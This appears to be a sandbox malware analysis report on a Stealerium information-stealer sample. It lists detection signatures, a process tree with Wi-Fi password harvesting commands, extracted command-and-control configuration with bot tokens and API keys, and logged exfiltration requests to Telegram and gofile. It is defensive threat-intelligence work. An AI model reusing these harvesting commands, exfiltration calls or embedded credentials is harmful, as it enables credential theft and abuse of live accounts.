Edit tour

Windows Analysis Report
uyz4YPUyc9.exe

Overview

General Information

Sample name:	uyz4YPUyc9.exe renamed because original name is a hash value
Original sample name:	0382fe4590a7ed87d9edaeb970a5322d8e0c9c44f1f6b9f2528b5a3668755e3d.exe
Analysis ID:	1565207
MD5:	49a803ae133197c359ee1460f65370af
SHA1:	18b66a5751773934256fa698f1cefbf5e522464c
SHA256:	0382fe4590a7ed87d9edaeb970a5322d8e0c9c44f1f6b9f2528b5a3668755e3d
Tags:	exevirustotal-vm-blacklistuser-JAMESWT_MHT
Infos:

Detection

Stealerium

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Stealerium

Yara detected Telegram RAT

Yara detected Telegram Recon

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Drops password protected ZIP file

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

uyz4YPUyc9.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\uyz4YPUyc9.exe" MD5: 49A803AE133197C359EE1460F65370AF)

cmd.exe (PID: 4760 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2876 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 2608 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 7108 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 1272 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6768 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 6556 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 1248 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 432 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

taskkill.exe (PID: 6300 cmdline: taskkill /F /PID 5276 MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

timeout.exe (PID: 6416 cmdline: timeout /T 2 /NOBREAK MD5: 100065E21CFBBDE57CBA2838921F84D6)

msiexec.exe (PID: 3364 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealerium	According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actors addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.	No Attribution	https://github.com/Stealerium/Stealerium https://resources.securityscorecard.com/research/stealerium-detailed-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7835902596, "is_bot": true, "first_name": "steltik", "username": "steltik_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}

Threatname: Stealerium

{"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
uyz4YPUyc9.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
uyz4YPUyc9.exe	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
uyz4YPUyc9.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
uyz4YPUyc9.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
uyz4YPUyc9.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3864db:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH.zip	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2307839115.000001D8389AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.2307839115.000001D838846000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x6ee4:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.2307839115.000001D838AEC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3862db:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: uyz4YPUyc9.exe PID: 5276	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
Process Memory Space: uyz4YPUyc9.exe PID: 5276	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: uyz4YPUyc9.exe PID: 5276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: uyz4YPUyc9.exe PID: 5276	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: uyz4YPUyc9.exe PID: 5276	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x7f413:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.uyz4YPUyc9.exe.1d836200000.0.unpack	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
0.0.uyz4YPUyc9.exe.1d836200000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.0.uyz4YPUyc9.exe.1d836200000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.uyz4YPUyc9.exe.1d836200000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3864db:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\uyz4YPUyc9.exe", ParentImage: C:\Users\user\Desktop\uyz4YPUyc9.exe, ParentProcessId: 5276, ParentProcessName: uyz4YPUyc9.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 4760, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Possible Generic RAT over Telegram API

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T12:28:23.457086+0100	2029323	1	Malware Command and Control Activity Detected	192.168.2.5	49724	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T12:28:14.551619+0100	2803305	3	Unknown Traffic	192.168.2.5	49712	104.16.184.241	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: uyz4YPUyc9.exe

Avira: detected

Found malware configuration

Source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Stealerium {"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
Source: uyz4YPUyc9.exe.5276.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7835902596, "is_bot": true, "first_name": "steltik", "username": "steltik_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}

Multi AV Scanner detection for submitted file

Source: uyz4YPUyc9.exe

ReversingLabs: Detection: 87%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Machine Learning detection for sample

Source: uyz4YPUyc9.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: uyz4YPUyc9.exe	String decryptor: 7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY
Source: uyz4YPUyc9.exe	String decryptor: 1386072644
Source: uyz4YPUyc9.exe	String decryptor: bc1qn8a5ucac6gqfsu6zjkeetzw5ejaajzur0e30jk
Source: uyz4YPUyc9.exe	String decryptor: 0x2930BC5cFC21Ed0b57A30290C11223568e45F4e4
Source: uyz4YPUyc9.exe	String decryptor: ltc1qx5lqzva2402x0n6cahk05djhhlhsj8a360m573
Source: uyz4YPUyc9.exe	String decryptor: https://api.telegram.org/bot
Source: uyz4YPUyc9.exe	String decryptor: https://szurubooru.zulipchat.com/api/v1/messages
Source: uyz4YPUyc9.exe	String decryptor: szurubooru@gmail.com
Source: uyz4YPUyc9.exe	String decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.244:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.210.246.148:443 -> 192.168.2.5:49733 version: TLS 1.2

Source: uyz4YPUyc9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2314206876.000001D850FE0000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed\|\|\|Newtonsoft.Json.Bson.pdb\|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F\|26968 source: uyz4YPUyc9.exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: uyz4YPUyc9.exe, 00000000.00000002.2314206876.000001D850FE0000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb\ source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: costura.costura.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: uyz4YPUyc9.exe
Source:	Binary string: !costura.polly.core.pdb.compressed source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed\|\|\|Wpf.Ui.pdb\|299223DFCADFE8FD464F218CE110C10266AB22B0\|139288 source: uyz4YPUyc9.exe
Source:	Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb\ source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389E0000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
Source:	Binary string: costura.polly.pdb.compressed source: uyz4YPUyc9.exe
Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: uyz4YPUyc9.exe
Source:	Binary string: costura.polly.pdb.compressed\|\|\|Polly.pdb\|6E4429D15FBCD96C44E391E109CB500EC2508333\|83400 source: uyz4YPUyc9.exe
Source:	Binary string: costura.polly.core.pdb.compressed\|\|\|Polly.Core.pdb\|C1D3F2BA348EA2F6635B8F5961AD127E831487C6\|66148 source: uyz4YPUyc9.exe
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed\|\|\|ICSharpCode.SharpZipLib.pdb\|E1FCA83029D1440F54FB3747B240365A6DF0A598\|121652 source: uyz4YPUyc9.exe
Source:	Binary string: costura.polly.core.pdb.compressed source: uyz4YPUyc9.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://szurubooru.zulipchat.com/api/v1/messages

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="5829e05e-a172-4b44-aff6-61726419cf46"Host: store5.gofile.ioContent-Length: 118541Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage?chat_id=1386072644&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%206%3A28%3A02%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20767668%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20MKU_6MO7%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FGyFZhD%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%22ee6368278fe03ac91c5f409f73928818%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/v1/messages HTTP/1.1Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM=Content-Type: application/x-www-form-urlencodedHost: szurubooru.zulipchat.comContent-Length: 1693Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.16.184.241 104.16.184.241

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 104.16.184.241:80
Source: Network traffic	Suricata IDS: 2029323 - Severity 1 - ET MALWARE Possible Generic RAT over Telegram API : 192.168.2.5:49724 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
